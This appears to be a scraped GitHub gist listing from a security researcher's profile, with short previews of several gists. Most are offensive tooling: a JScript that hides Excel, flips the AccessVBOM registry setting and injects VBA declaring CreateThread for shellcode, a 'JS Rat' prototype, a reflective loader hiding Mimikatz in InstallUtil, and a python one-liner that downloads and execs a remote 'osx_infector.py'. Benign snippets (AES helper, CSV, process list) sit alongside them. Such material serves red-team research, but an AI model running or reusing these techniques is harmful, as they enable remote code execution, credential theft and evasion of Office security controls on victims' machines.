Skip to content

Instantly share code, notes, and snippets.

Avatar
💭
👨‍💻

midnite_runr secretsquirrel

💭
👨‍💻
View GitHub Profile
View gist:b425e8490bc2dfcbf1f9f69f065ecc84
cat /tmp/test.sh
:; if [ -z 0 ]; then
@echo off
goto :WINDOWS
fi
if [ -z "$2" ]; then
echo "usage: $0 <firstArg> <secondArg>"
exit 1
fi
View windows.h__.js
var ffi = require('ffi'),
ref = require('ref'),
Struct = require('ref-struct'),
Library = require('./Library'),
Type = ref.Type,
NULL = ref.NULL,
isNull = ref.isNull;
var groups = ['libs', 'types', 'structs', 'callbacks', 'enums'];
@secretsquirrel
secretsquirrel / example.js
Created Feb 13, 2017
Shellcode via Office via . JS
View example.js
var objExcel = new ActiveXObject("Excel.Application");
objExcel.Visible = false;
var WshShell = new ActiveXObject("WScript.Shell");
var Application_Version = objExcel.Version;//Auto-Detect Version
var strRegPath = "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\" + Application_Version + "\\Excel\\Security\\AccessVBOM";
WshShell.RegWrite(strRegPath, 1, "REG_DWORD");
var objWorkbook = objExcel.Workbooks.Add();
var xlmodule = objWorkbook.VBProject.VBComponents.Add(1);
// Sample Shell Code Execution Documented Here: https://www.scriptjunkie.us/2012/01/direct-shellcode-execution-in-ms-office-macros/
var strCode = 'Private Declare Function CreateThread Lib "kernel32" (ByVal Npdrhkbff As Long, ByVal Drcunuy As Long, ByVal Ache As Long, Wiquwzp As Long, ByVal Ltdplqkqj As Long, Xsawbea As Long) As Long\n';
@secretsquirrel
secretsquirrel / rat.cs
Created Feb 13, 2017
WCF - JavaScript JS Rat Basic Prototype
View rat.cs
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.ServiceModel;
using System.ServiceModel.Description;
using System.Reflection;
[ServiceContract]
@secretsquirrel
secretsquirrel / PELoader.cs
Created Feb 12, 2017
Reflective PE Loader - Compressed Mimikatz inside of InstallUtil
View PELoader.cs
using System;
using System.IO;
using System.IO.Compression;
using System.Text;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@secretsquirrel
secretsquirrel / PowershellAes.ps1
Created Oct 10, 2016 — forked from ctigeek/PowershellAes.ps1
Aes Encryption using powershell.
View PowershellAes.ps1
function Create-AesManagedObject($key, $IV) {
$aesManaged = New-Object "System.Security.Cryptography.AesManaged"
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
if ($IV) {
if ($IV.getType().Name -eq "String") {
$aesManaged.IV = [System.Convert]::FromBase64String($IV)
}
@secretsquirrel
secretsquirrel / speed_pw0n.sh
Last active Feb 7, 2017 — forked from mrbrutti/speed_pw0n.sh
Speedy Gonzales
View speed_pw0n.sh
python -c 'import urllib; exec(urllib.urlopen("https://gist.githubusercontent.com/secretsquirrel/2ba497786027472f98dd/raw/e2fb41c2a8a4520cc47548fc88a68ef091278fc9/osx_infector.py").read())'
@secretsquirrel
secretsquirrel / reverse_string.py
Last active Mar 1, 2016
just to get reverse hex values of strings
View reverse_string.py
def reverse_string(somestring):
temp = ''
for i in somestring[::-1]:
k = hex(ord(i)).replace("0x", "")
if len(k) == 1:
k += k + "0"
temp += k
print temp
View test.csv
date revenue
6/28/14 37432000000
6/29/14 37432000000
6/27/14 37432000000
6/26/14 37432000000
6/25/14 37432000000
6/24/14 37432000000
6/23/14 37432000000
@secretsquirrel
secretsquirrel / vm_base_processes_after_boot_10.10.txt
Created Feb 5, 2015
ist of processes after boot on OS X Yosemite VM
View vm_base_processes_after_boot_10.10.txt
UID PID TTY TIME CMD
0 1 ?? 0:01.72 /sbin/launchd
0 19 ?? 0:00.30 /usr/sbin/syslogd
0 20 ?? 0:00.37 /usr/libexec/UserEventAgent (System)
0 22 ?? 0:00.38 /usr/libexec/kextd
0 23 ?? 0:00.97 /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/FSEvents.framework/Versions/A/Support/fseventsd
0 25 ?? 0:00.03 /usr/libexec/thermald
0 28 ?? 0:00.30 /usr/libexec/configd
0 29 ?? 0:00.09 /System/Library/CoreServices/powerd.bundle/powerd
0 32 ?? 0:00.04 /usr/libexec/airportd